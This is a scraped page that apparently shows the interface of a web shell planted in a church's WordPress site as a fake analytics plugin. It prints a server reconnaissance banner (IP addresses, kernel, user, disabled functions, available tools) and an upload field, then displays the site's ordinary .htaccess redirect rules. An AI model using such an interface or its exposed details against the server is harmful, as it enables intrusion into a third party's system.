Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/hopeinstoughton_www/ |
Upload File : |
# Direct requests starting with www to the base domain URL
Options +FollowSymlinks -Indexes
RewriteEngine on
#RewriteCond %{http_host} ^www.hopeinstoughton.org [NC]
#RewriteRule ^(.*)$ http://hopeinstoughton.org/$1 [R=302,L]
Redirect 302 /fc2018 /wp-content/uploads/2018/02/first-century.pdf
Redirect 302 /whatsnew.php /whats-new/
Redirect 302 /resources.php /bible-study-resources/
Redirect 302 /purpose.php /our-purpose/
Redirect 302 /calendar.php /calendar/
Redirect 302 /aboutus.php /about-us/
Redirect 302 /belief.php /our-belief/
Redirect 302 /photos.php /
Redirect 302 /request.php /request/
Redirect 302 /filecabinet.php /file-cabinet/
Redirect 302 /home.php /
Redirect 302 /the-patched-cloth /parables-matthew/5/
Redirect 302 /the-patched-cloth/ /parables-matthew/5/
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^/?(.*) https://%{SERVER_NAME}/$1 [R=302,L]
</IfModule>
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress